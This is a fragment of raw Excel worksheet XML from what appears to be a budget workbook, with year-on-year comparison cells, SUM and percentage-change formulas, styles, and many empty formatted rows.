      <c r="F7" s="486"/>
      <c r="G7" s="486"/>
      <c r="H7" s="486"/>
      <c r="I7" s="486"/>
      <c r="J7" s="486"/>
      <c r="K7" s="486"/>
      <c r="L7" s="486"/>
      <c r="M7" s="486"/>
      <c r="N7" s="486"/>
      <c r="O7" s="486"/>
      <c r="P7" s="486"/>
      <c r="Q7" s="486"/>
    </row>
    <row r="8" ht="32.65" customHeight="1" spans="1:17">
      <c r="A8" s="484" t="s">
        <v>708</v>
      </c>
      <c r="B8" s="485">
        <v>0</v>
      </c>
      <c r="C8" s="486"/>
      <c r="D8" s="480"/>
      <c r="E8" s="486"/>
      <c r="F8" s="486"/>
      <c r="G8" s="486"/>
      <c r="H8" s="486"/>
      <c r="I8" s="486"/>
      <c r="J8" s="486"/>
      <c r="K8" s="486"/>
      <c r="L8" s="486"/>
      <c r="M8" s="486"/>
      <c r="N8" s="486"/>
      <c r="O8" s="486"/>
      <c r="P8" s="486"/>
      <c r="Q8" s="486"/>
    </row>
    <row r="9" ht="32.65" customHeight="1" spans="1:17">
      <c r="A9" s="484" t="s">
        <v>709</v>
      </c>
      <c r="B9" s="485">
        <v>0</v>
      </c>
      <c r="C9" s="486"/>
      <c r="D9" s="480"/>
      <c r="E9" s="486"/>
      <c r="F9" s="486"/>
      <c r="G9" s="486"/>
      <c r="H9" s="486"/>
      <c r="I9" s="486"/>
      <c r="J9" s="486"/>
      <c r="K9" s="486"/>
      <c r="L9" s="486"/>
      <c r="M9" s="486"/>
      <c r="N9" s="486"/>
      <c r="O9" s="486"/>
      <c r="P9" s="486"/>
      <c r="Q9" s="486"/>
    </row>
    <row r="10" ht="32.65" customHeight="1" spans="1:17">
      <c r="A10" s="484" t="s">
        <v>710</v>
      </c>
      <c r="B10" s="485">
        <v>0</v>
      </c>
      <c r="C10" s="486"/>
      <c r="D10" s="480"/>
      <c r="E10" s="486"/>
      <c r="F10" s="486"/>
      <c r="G10" s="486"/>
      <c r="H10" s="486"/>
      <c r="I10" s="486"/>
      <c r="J10" s="486"/>
      <c r="K10" s="486"/>
      <c r="L10" s="486"/>
      <c r="M10" s="486"/>
      <c r="N10" s="486"/>
      <c r="O10" s="486"/>
      <c r="P10" s="486"/>
      <c r="Q10" s="486"/>
    </row>
    <row r="11" ht="32.65" customHeight="1" spans="1:17">
      <c r="A11" s="484" t="s">
        <v>711</v>
      </c>
      <c r="B11" s="485">
        <v>0</v>
      </c>
      <c r="C11" s="486"/>
      <c r="D11" s="480"/>
      <c r="E11" s="486"/>
      <c r="F11" s="486"/>
      <c r="G11" s="486"/>
      <c r="H11" s="486"/>
      <c r="I11" s="486"/>
      <c r="J11" s="486"/>
      <c r="K11" s="486"/>
      <c r="L11" s="486"/>
      <c r="M11" s="486"/>
      <c r="N11" s="486"/>
      <c r="O11" s="486"/>
      <c r="P11" s="486"/>
      <c r="Q11" s="486"/>
    </row>
    <row r="12" ht="32.65" customHeight="1" spans="1:17">
      <c r="A12" s="484" t="s">
        <v>712</v>
      </c>
      <c r="B12" s="485">
        <v>0</v>
      </c>
      <c r="C12" s="486"/>
      <c r="D12" s="480"/>
      <c r="E12" s="486"/>
      <c r="F12" s="486"/>
      <c r="G12" s="486"/>
      <c r="H12" s="486"/>
      <c r="I12" s="486"/>
      <c r="J12" s="486"/>
      <c r="K12" s="486"/>
      <c r="L12" s="486"/>
      <c r="M12" s="486"/>
      <c r="N12" s="486"/>
      <c r="O12" s="486"/>
      <c r="P12" s="486"/>
      <c r="Q12" s="486"/>
    </row>
    <row r="13" ht="32.65" customHeight="1" spans="1:17">
      <c r="A13" s="484" t="s">
        <v>713</v>
      </c>
      <c r="B13" s="485">
        <v>0</v>
      </c>
      <c r="C13" s="486"/>
      <c r="D13" s="480"/>
      <c r="E13" s="486"/>
      <c r="F13" s="486"/>
      <c r="G13" s="486"/>
      <c r="H13" s="486"/>
      <c r="I13" s="486"/>
      <c r="J13" s="486"/>
      <c r="K13" s="486"/>
      <c r="L13" s="486"/>
      <c r="M13" s="486"/>
      <c r="N13" s="486"/>
      <c r="O13" s="486"/>
      <c r="P13" s="486"/>
      <c r="Q13" s="486"/>
    </row>
    <row r="14" ht="32.65" customHeight="1" spans="1:17">
      <c r="A14" s="484" t="s">
        <v>714</v>
      </c>
      <c r="B14" s="485">
        <v>0</v>
      </c>
      <c r="C14" s="486"/>
      <c r="D14" s="480"/>
      <c r="E14" s="486"/>
      <c r="F14" s="486"/>
      <c r="G14" s="486"/>
      <c r="H14" s="486"/>
      <c r="I14" s="486"/>
      <c r="J14" s="486"/>
      <c r="K14" s="486"/>
      <c r="L14" s="486"/>
      <c r="M14" s="486"/>
      <c r="N14" s="486"/>
      <c r="O14" s="486"/>
      <c r="P14" s="486"/>
      <c r="Q14" s="486"/>
    </row>
    <row r="15" ht="32.65" customHeight="1" spans="1:17">
      <c r="A15" s="484" t="s">
        <v>2135</v>
      </c>
      <c r="B15" s="485">
        <v>0</v>
      </c>
      <c r="C15" s="486"/>
      <c r="D15" s="480"/>
      <c r="E15" s="486"/>
      <c r="F15" s="486"/>
      <c r="G15" s="486"/>
      <c r="H15" s="486"/>
      <c r="I15" s="486"/>
      <c r="J15" s="486"/>
      <c r="K15" s="486"/>
      <c r="L15" s="486"/>
      <c r="M15" s="486"/>
      <c r="N15" s="486"/>
      <c r="O15" s="486"/>
      <c r="P15" s="486"/>
      <c r="Q15" s="486"/>
    </row>
    <row r="16" ht="32.65" customHeight="1" spans="1:17">
      <c r="A16" s="487" t="s">
        <v>813</v>
      </c>
      <c r="B16" s="488">
        <v>0</v>
      </c>
      <c r="C16" s="486"/>
      <c r="D16" s="486"/>
      <c r="E16" s="486"/>
      <c r="F16" s="486"/>
      <c r="G16" s="486"/>
      <c r="H16" s="486"/>
      <c r="I16" s="486"/>
      <c r="J16" s="486"/>
      <c r="K16" s="486"/>
      <c r="L16" s="486"/>
      <c r="M16" s="486"/>
      <c r="N16" s="486"/>
      <c r="O16" s="486"/>
      <c r="P16" s="486"/>
      <c r="Q16" s="486"/>
    </row>
    <row r="17" ht="23.1" customHeight="1" spans="1:1">
      <c r="A17" s="316" t="s">
        <v>818</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:B2"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:D184"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="1" ySplit="4" topLeftCell="B5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A4" sqref="A4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="48.5740740740741" style="422" customWidth="1"/>
    <col min="2" max="2" width="15.8425925925926" style="422" customWidth="1"/>
    <col min="3" max="3" width="15.7222222222222" style="422" customWidth="1"/>
    <col min="4" max="4" width="14" style="422" customWidth="1"/>
    <col min="5" max="29" width="10.2777777777778" style="422" customWidth="1"/>
    <col min="30" max="157" width="9.14814814814815" style="422" customWidth="1"/>
    <col min="158" max="170" width="10.2777777777778" style="422" customWidth="1"/>
    <col min="171" max="16382" width="9.14814814814815" style="422"/>
    <col min="16383" max="16384" width="9" style="422"/>
  </cols>
  <sheetData>
    <row r="1" ht="24" customHeight="1" spans="1:4">
      <c r="A1" s="445" t="s">
        <v>2169</v>
      </c>
      <c r="B1" s="446"/>
      <c r="C1" s="446"/>
      <c r="D1" s="447"/>
    </row>
    <row r="2" s="374" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A2" s="448" t="s">
        <v>2170</v>
      </c>
      <c r="B2" s="448"/>
      <c r="C2" s="448"/>
      <c r="D2" s="448"/>
    </row>
    <row r="3" s="375" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A3" s="446"/>
      <c r="B3" s="446"/>
      <c r="C3" s="446"/>
      <c r="D3" s="447" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="419" customFormat="1" ht="46" customHeight="1" spans="1:4">
      <c r="A4" s="425" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="426" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="426" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="426" t="s">
        <v>917</v>
      </c>
    </row>
    <row r="5" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A5" s="428" t="s">
        <v>595</v>
      </c>
      <c r="B5" s="430"/>
      <c r="C5" s="449">
        <v>42</v>
      </c>
      <c r="D5" s="450"/>
    </row>
    <row r="6" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A6" s="451" t="s">
        <v>596</v>
      </c>
      <c r="B6" s="430">
        <v>1770</v>
      </c>
      <c r="C6" s="449">
        <v>6700</v>
      </c>
      <c r="D6" s="450">
        <f>(C6-B6)/B6*100</f>
        <v>278.531073446328</v>
      </c>
    </row>
    <row r="7" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A7" s="452" t="s">
        <v>918</v>
      </c>
      <c r="B7" s="430">
        <v>1770</v>
      </c>
      <c r="C7" s="449">
        <v>6700</v>
      </c>
      <c r="D7" s="450">
        <f>(C7-B7)/B7*100</f>
        <v>278.531073446328</v>
      </c>
    </row>
    <row r="8" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A8" s="452" t="s">
        <v>919</v>
      </c>
      <c r="B8" s="430"/>
      <c r="C8" s="449"/>
      <c r="D8" s="450"/>
    </row>
    <row r="9" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A9" s="428" t="s">
        <v>599</v>
      </c>
      <c r="B9" s="430"/>
      <c r="C9" s="430"/>
      <c r="D9" s="450"/>
    </row>
    <row r="10" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A10" s="433" t="s">
        <v>920</v>
      </c>
      <c r="B10" s="453"/>
      <c r="C10" s="453"/>
      <c r="D10" s="450"/>
    </row>
    <row r="11" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A11" s="433" t="s">
        <v>921</v>
      </c>
      <c r="B11" s="453">
        <v>0</v>
      </c>
      <c r="C11" s="454"/>
      <c r="D11" s="450"/>
    </row>
    <row r="12" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A12" s="428" t="s">
        <v>602</v>
      </c>
      <c r="B12" s="455"/>
      <c r="C12" s="453"/>
      <c r="D12" s="450"/>
    </row>
    <row r="13" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A13" s="428" t="s">
        <v>603</v>
      </c>
      <c r="B13" s="430">
        <v>10000</v>
      </c>
      <c r="C13" s="449"/>
      <c r="D13" s="450">
        <f>(C13-B13)/B13*100</f>
        <v>-100</v>
      </c>
    </row>
    <row r="14" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A14" s="456" t="s">
        <v>2171</v>
      </c>
      <c r="B14" s="457">
        <f>B5+B6+B9+B12+B13</f>
        <v>11770</v>
      </c>
      <c r="C14" s="457">
        <f>C5+C6+C9+C12+C13</f>
        <v>6742</v>
      </c>
      <c r="D14" s="450">
        <f>(C14-B14)/B14*100</f>
        <v>-42.7187765505522</v>
      </c>
    </row>
    <row r="15" s="420" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A15" s="458" t="s">
        <v>2172</v>
      </c>
      <c r="B15" s="459">
        <f>B16+B18</f>
        <v>39</v>
      </c>
      <c r="C15" s="460">
        <f>C16+C18</f>
        <v>39</v>
      </c>
      <c r="D15" s="450">
        <f>(C15-B15)/B15*100</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" s="420" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A16" s="461" t="s">
        <v>2173</v>
      </c>
      <c r="B16" s="462">
        <v>39</v>
      </c>
      <c r="C16" s="463">
        <v>39</v>
      </c>
      <c r="D16" s="450">
        <f>(C16-B16)/B16*100</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" s="420" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A17" s="461" t="s">
        <v>2174</v>
      </c>
      <c r="B17" s="464">
        <v>0</v>
      </c>
      <c r="C17" s="465">
        <v>0</v>
      </c>
      <c r="D17" s="450"/>
    </row>
    <row r="18" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A18" s="466" t="s">
        <v>2175</v>
      </c>
      <c r="B18" s="464"/>
      <c r="C18" s="465"/>
      <c r="D18" s="450"/>
    </row>
    <row r="19" s="419" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A19" s="467" t="s">
        <v>2176</v>
      </c>
      <c r="B19" s="468">
        <f>B14+B15</f>
        <v>11809</v>
      </c>
      <c r="C19" s="469">
        <f>C14+C15</f>
        <v>6781</v>
      </c>
      <c r="D19" s="470">
        <f>(C19-B19)/B19*100</f>
        <v>-42.5776949784063</v>
      </c>
    </row>
    <row r="20" s="421" customFormat="1" ht="12"/>
    <row r="21" s="421" customFormat="1" ht="12"/>
    <row r="22" s="421" customFormat="1" ht="12"/>
    <row r="23" s="421" customFormat="1" ht="12"/>
    <row r="24" s="421" customFormat="1" ht="12"/>
    <row r="25" s="421" customFormat="1" ht="12"/>
    <row r="26" s="421" customFormat="1" ht="12"/>
    <row r="27" s="421" customFormat="1" ht="12"/>
    <row r="28" s="421" customFormat="1" ht="12"/>
    <row r="29" s="421" customFormat="1" ht="12"/>
    <row r="30" s="421" customFormat="1" ht="12"/>
    <row r="31" s="421" customFormat="1" ht="12"/>
    <row r="32" s="421" customFormat="1" ht="12"/>
    <row r="33" s="421" customFormat="1" ht="12"/>
    <row r="34" s="421" customFormat="1" ht="12"/>
    <row r="35" s="421" customFormat="1" ht="12"/>
    <row r="36" s="421" customFormat="1" ht="12"/>
    <row r="37" s="421" customFormat="1" ht="12"/>
    <row r="38" s="421" customFormat="1" ht="12"/>
    <row r="39" s="421" customFormat="1" ht="12"/>
    <row r="40" s="421" customFormat="1" ht="12"/>
    <row r="41" s="421" customFormat="1" ht="12"/>
    <row r="42" s="421" customFormat="1" ht="12"/>
    <row r="43" s="421" customFormat="1" ht="12"/>
    <row r="44" s="421" customFormat="1" ht="12"/>
    <row r="45" s="421" customFormat="1" ht="12"/>
    <row r="46" s="421" customFormat="1" ht="12"/>
    <row r="47" s="421" customFormat="1" ht="12"/>
    <row r="48" s="421" customFormat="1" ht="12"/>
    <row r="49" s="421" customFormat="1" ht="12"/>
    <row r="50" s="421" customFormat="1" ht="12"/>
    <row r="51" s="421" customFormat="1" ht="12"/>
    <row r="52" s="421" customFormat="1" ht="12"/>
    <row r="53" s="421" customFormat="1" ht="12"/>
    <row r="54" s="421" customFormat="1" ht="12"/>
    <row r="55" s="421" customFormat="1" ht="12"/>
    <row r="56" s="421" customFormat="1" ht="12"/>
    <row r="57" s="421" customFormat="1" ht="12"/>
    <row r="58" s="421" customFormat="1" ht="12"/>
    <row r="59" s="421" customFormat="1" ht="12"/>
    <row r="60" s="421" customFormat="1" ht="12"/>
    <row r="61" s="421" customFormat="1" ht="12"/>
    <row r="62" s="421" customFormat="1" ht="12"/>
    <row r="63" s="421" customFormat="1" ht="12"/>
    <row r="64" s="421" customFormat="1" ht="12"/>
    <row r="65" s="421" customFormat="1" ht="12"/>
    <row r="66" s="421" customFormat="1" ht="12"/>
    <row r="67" s="421" customFormat="1" ht="12"/>
    <row r="68" s="421" customFormat="1" ht="12"/>
    <row r="69" s="421" customFormat="1" ht="12"/>
    <row r="70" s="421" customFormat="1" ht="12"/>
    <row r="71" s="421" customFormat="1" ht="12"/>
    <row r="72" s="421" customFormat="1" ht="12"/>
    <row r="73" s="421" customFormat="1" ht="12"/>
    <row r="74" s="421" customFormat="1" ht="12"/>
    <row r="75" s="421" customFormat="1" ht="12"/>
    <row r="76" s="421" customFormat="1" ht="12"/>
    <row r="77" s="421" customFormat="1" ht="12"/>
    <row r="78" s="421" customFormat="1" ht="12"/>
    <row r="79" s="421" customFormat="1" ht="12"/>
    <row r="80" s="421" customFormat="1" ht="12"/>
    <row r="81" s="421" customFormat="1" ht="12"/>
    <row r="82" s="421" customFormat="1" ht="12"/>
    <row r="83" s="421" customFormat="1" ht="12"/>
    <row r="84" s="421" customFormat="1" ht="12"/>
    <row r="85" s="421" customFormat="1" ht="12"/>
    <row r="86" s="421" customFormat="1" ht="12"/>
    <row r="87" s="421" customFormat="1" ht="12"/>
    <row r="88" s="421" customFormat="1" ht="12"/>
    <row r="89" s="421" customFormat="1" ht="12"/>
    <row r="90" s="421" customFormat="1" ht="12"/>
    <row r="91" s="421" customFormat="1" ht="12"/>
    <row r="92" s="421" customFormat="1" ht="12"/>
    <row r="93" s="421" customFormat="1" ht="12"/>
    <row r="94" s="421" customFormat="1" ht="12"/>
    <row r="95" s="421" customFormat="1" ht="12"/>
    <row r="96" s="421" customFormat="1" ht="12"/>
    <row r="97" s="421" customFormat="1" ht="12"/>
    <row r="98" s="421" customFormat="1" ht="12"/>
    <row r="99" s="421" customFormat="1" ht="12"/>
    <row r="100" s="421" customFormat="1" ht="12"/>
    <row r="101" s="421" customFormat="1" ht="12"/>
    <row r="102" s="421" customFormat="1" ht="12"/>
    <row r="103" s="421" customFormat="1" ht="12"/>
    <row r="104" s="421" customFormat="1" ht="12"/>
    <row r="105" s="421" customFormat="1" ht="12"/>
    <row r="106" s="421" customFormat="1" ht="12"/>
    <row r="107" s="421" customFormat="1" ht="12"/>
    <row r="108" s="421" customFormat="1" ht="12"/>
    <row r="109" s="421" customFormat="1" ht="12"/>
    <row r="110" s="421" customFormat="1" ht="12"/>
    <row r="111" s="421" customFormat="1" ht="12"/>
    <row r="112" s="421" customFormat="1" ht="12"/>
    <row r="113" s="421" customFormat="1" ht="12"/>
    <row r="114" s="421" customFormat="1" ht="12"/>
    <row r="115" s="421" customFormat="1" ht="12"/>
    <row r="116" s="421" customFormat="1" ht="12"/>
    <row r="117" s="421" customFormat="1" ht="12"/>
    <row r="118" s="421" customFormat="1" ht="12"/>
    <row r="119" s="421" customFormat="1" ht="12"/>
    <row r="120" s="421" customFormat="1" ht="12"/>
    <row r="121" s="421" customFormat="1" ht="12"/>
    <row r="122" s="421" customFormat="1" ht="12"/>
    <row r="123" s="421" customFormat="1" ht="12"/>
    <row r="124" s="421" customFormat="1" ht="12"/>
    <row r="125" s="421" customFormat="1" ht="12"/>
    <row r="126" s="421" customFormat="1" ht="12"/>
    <row r="127" s="421" customFormat="1" ht="12"/>
    <row r="128" s="421" customFormat="1" ht="12"/>
    <row r="129" s="421" customFormat="1" ht="12"/>
    <row r="130" s="421" customFormat="1" ht="12"/>
    <row r="131" s="421" customFormat="1" ht="12"/>
    <row r="132" s="421" customFormat="1" ht="12"/>
    <row r="133" s="421" customFormat="1" ht="12"/>
    <row r="134" s="421" customFormat="1" ht="12"/>
    <row r="135" s="421" customFormat="1" ht="12"/>
    <row r="136" s="421" customFormat="1" ht="12"/>
    <row r="137" s="421" customFormat="1" ht="12"/>
    <row r="138" s="421" customFormat="1" ht="12"/>
    <row r="139" s="421" customFormat="1" ht="12"/>
    <row r="140" s="421" customFormat="1" ht="12"/>
    <row r="141" s="421" customFormat="1" ht="12"/>
    <row r="142" s="421" customFormat="1" ht="12"/>
    <row r="143" s="421" customFormat="1" ht="12"/>
    <row r="144" s="421" customFormat="1" ht="12"/>
    <row r="145" s="421" customFormat="1" ht="12"/>
    <row r="146" s="421" customFormat="1" ht="12"/>
    <row r="147" s="421" customFormat="1" ht="12"/>
    <row r="148" s="421" customFormat="1" ht="12"/>
    <row r="149" s="421" customFormat="1" ht="12"/>
    <row r="150" s="421" customFormat="1" ht="12"/>
    <row r="151" s="421" customFormat="1" ht="12"/>
    <row r="152" s="421" customFormat="1" ht="12"/>
    <row r="153" s="421" customFormat="1" ht="12"/>
    <row r="154" s="421" customFormat="1" ht="12"/>
    <row r="155" s="421" customFormat="1" ht="12"/>
    <row r="156" s="421" customFormat="1" ht="12"/>
    <row r="157" s="421" customFormat="1" ht="12"/>
    <row r="158" s="421" customFormat="1" ht="12"/>
    <row r="159" s="421" customFormat="1" ht="12"/>
    <row r="160" s="421" customFormat="1" ht="12"/>
    <row r="161" s="421" customFormat="1" ht="12"/>
    <row r="162" s="421" customFormat="1" ht="12"/>
    <row r="163" s="421" customFormat="1" ht="12"/>
    <row r="164" s="421" customFormat="1" ht="12"/>
    <row r="165" s="421" customFormat="1" ht="12"/>
    <row r="166" s="421" customFormat="1" ht="12"/>
    <row r="167" s="421" customFormat="1" ht="12"/>
    <row r="168" s="421" customFormat="1" ht="12"/>
    <row r="169" s="421" customFormat="1" ht="12"/>
    <row r="170" s="421" customFormat="1" ht="12"/>
    <row r="171" s="421" customFormat="1" ht="12"/>
    <row r="172" s="421" customFormat="1" ht="12"/>
    <row r="173" s="421" customFormat="1" ht="12"/>
    <row r="174" s="421" customFormat="1" ht="12"/>
    <row r="175" s="421" customFormat="1" ht="12"/>
    <row r="176" s="421" customFormat="1" ht="12"/>
    <row r="177" s="421" customFormat="1" ht="12"/>
    <row r="178" s="421" customFormat="1" ht="12"/>
    <row r="179" s="421" customFormat="1" ht="12"/>
    <row r="180" s="421" customFormat="1" ht="12"/>
    <row r="181" s="421" customFormat="1" ht="12"/>
    <row r="182" s="421" customFormat="1" ht="12"/>
    <row r="183" s="421" customFormat="1" ht="12"/>
    <row r="184" s="421" customFormat="1" ht="12"/>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:D2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39" right="0.39" top="0.79" bottom="0.79" header="0.31" footer="0.31"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:I183"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="2" ySplit="5" topLeftCell="C6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="E30" sqref="E30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.84259259259259" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="41" style="422" customWidth="1"/>
    <col min="2" max="2" width="15.5740740740741" style="422" customWidth="1"/>
    <col min="3" max="3" width="16.1481481481481" style="422" customWidth="1"/>
    <col min="4" max="4" width="18.2777777777778" style="422" customWidth="1"/>
    <col min="5" max="15" width="10.2777777777778" style="422" customWidth="1"/>
    <col min="16" max="143" width="9.14814814814815" style="422" customWidth="1"/>
    <col min="144" max="156" width="10.2777777777778" style="422" customWidth="1"/>
    <col min="157" max="240" width="9.14814814814815" style="422" customWidth="1"/>
    <col min="241" max="16384" width="8.84259259259259" style="422"/>
  </cols>
  <sheetData>
    <row r="1" ht="24" customHeight="1" spans="1:4">
      <c r="A1" s="423" t="s">
        <v>2177</v>
      </c>
      <c r="B1" s="379"/>
      <c r="C1" s="379"/>
      <c r="D1" s="379"/>
    </row>
    <row r="2" s="374" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A2" s="380" t="s">
        <v>2178</v>
      </c>
      <c r="B2" s="380"/>
      <c r="C2" s="380"/>
      <c r="D2" s="380"/>
    </row>
    <row r="3" s="375" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A3" s="424" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="424"/>
      <c r="C3" s="424"/>
      <c r="D3" s="424"/>
    </row>
    <row r="4" s="419" customFormat="1" ht="45" customHeight="1" spans="1:4">
      <c r="A4" s="425" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="426" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="426" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="427" t="s">
        <v>917</v>
      </c>
    </row>
    <row r="5" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A5" s="428" t="s">
        <v>608</v>
      </c>
      <c r="B5" s="429"/>
      <c r="C5" s="430"/>
      <c r="D5" s="431"/>
    </row>
    <row r="6" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A6" s="428" t="s">
        <v>609</v>
      </c>
      <c r="B6" s="430">
        <f>SUM(B7:B8)</f>
        <v>64</v>
      </c>
      <c r="C6" s="430">
        <f>SUM(C7:C8)</f>
        <v>81</v>
      </c>
      <c r="D6" s="432">
        <f>IFERROR((C6-B6)/B6*100,"-")</f>
        <v>26.5625</v>
      </c>
    </row>
    <row r="7" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A7" s="433" t="s">
        <v>925</v>
      </c>
      <c r="B7" s="430">
        <v>58</v>
      </c>
      <c r="C7" s="430">
        <v>74</v>
      </c>
      <c r="D7" s="432">
        <f>IFERROR((C7-B7)/B7*100,"-")</f>
        <v>27.5862068965517</v>
      </c>
    </row>
    <row r="8" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A8" s="433" t="s">
        <v>817</v>
      </c>
      <c r="B8" s="434">
        <v>6</v>
      </c>
      <c r="C8" s="434">
        <v>7</v>
      </c>
      <c r="D8" s="432">
        <f>IFERROR((C8-B8)/B8*100,"-")</f>
        <v>16.6666666666667</v>
      </c>
    </row>
    <row r="9" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A9" s="435"/>
      <c r="B9" s="434"/>
      <c r="C9" s="434"/>
      <c r="D9" s="432"/>
    </row>
    <row r="10" s="420" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A10" s="435"/>
      <c r="B10" s="434"/>
      <c r="C10" s="434"/>
      <c r="D10" s="432"/>
    </row>
    <row r="11" s="420" customFormat="1" ht="27.95" customHeight="1" spans="1:9">
      <c r="A11" s="435"/>
      <c r="B11" s="434"/>
      <c r="C11" s="434"/>
      <c r="D11" s="432"/>
      <c r="I11" s="444"/>
    </row>
    <row r="12" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A12" s="435"/>
      <c r="B12" s="434"/>
      <c r="C12" s="434"/>
      <c r="D12" s="432"/>
    </row>
    <row r="13" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A13" s="436" t="s">
        <v>927</v>
      </c>
      <c r="B13" s="437">
        <f>SUM(B5:B6)</f>
        <v>64</v>
      </c>
      <c r="C13" s="437">
        <f>SUM(C5:C6)</f>
        <v>81</v>
      </c>
      <c r="D13" s="438">
        <f t="shared" ref="D13:D16" si="0">IFERROR((C13-B13)/B13*100,"-")</f>
        <v>26.5625</v>
      </c>
    </row>
    <row r="14" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A14" s="439" t="s">
        <v>778</v>
      </c>
      <c r="B14" s="440">
        <f>SUM(B15:B17)</f>
        <v>11745</v>
      </c>
      <c r="C14" s="440">
        <f>SUM(C15:C17)</f>
        <v>6700</v>
      </c>
      <c r="D14" s="432">
        <f t="shared" si="0"/>
        <v>-42.9544487015751</v>
      </c>
    </row>
    <row r="15" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A15" s="435" t="s">
        <v>781</v>
      </c>
      <c r="B15" s="440">
        <v>11731</v>
      </c>
      <c r="C15" s="440">
        <v>6700</v>
      </c>
      <c r="D15" s="432">
        <f t="shared" si="0"/>
        <v>-42.8863694484699</v>
      </c>
    </row>
    <row r="16" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A16" s="435" t="s">
        <v>2150</v>
      </c>
      <c r="B16" s="440">
        <v>14</v>
      </c>
      <c r="C16" s="440"/>
      <c r="D16" s="432">
        <f t="shared" si="0"/>
        <v>-100</v>
      </c>
    </row>
    <row r="17" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A17" s="435" t="s">
        <v>928</v>
      </c>
      <c r="B17" s="440"/>
      <c r="C17" s="440"/>
      <c r="D17" s="432"/>
    </row>
    <row r="18" s="419" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A18" s="441" t="s">
        <v>783</v>
      </c>
      <c r="B18" s="442">
        <f>B14+B13</f>
        <v>11809</v>
      </c>
      <c r="C18" s="442">
        <f>C14+C13</f>
        <v>6781</v>
      </c>
      <c r="D18" s="443">
        <f>IFERROR((C18-B18)/B18*100,"-")</f>
        <v>-42.5776949784063</v>
      </c>
    </row>
    <row r="19" s="421" customFormat="1" ht="12"/>
    <row r="20" s="421" customFormat="1" ht="12"/>
    <row r="21" s="421" customFormat="1" ht="12"/>
    <row r="22" s="421" customFormat="1" ht="12"/>
    <row r="23" s="421" customFormat="1" ht="12"/>
    <row r="24" s="421" customFormat="1" ht="12"/>
    <row r="25" s="421" customFormat="1" ht="12"/>
    <row r="26" s="421" customFormat="1" ht="12"/>
    <row r="27" s="421" customFormat="1" ht="12"/>
    <row r="28" s="421" customFormat="1" ht="12"/>
    <row r="29" s="421" customFormat="1" ht="12"/>
    <row r="30" s="421" customFormat="1" ht="12"/>
    <row r="31" s="421" customFormat="1" ht="12"/>
    <row r="32" s="421" customFormat="1" ht="12"/>
    <row r="33" s="421" customFormat="1" ht="12"/>
    <row r="34" s="421" customFormat="1" ht="12"/>
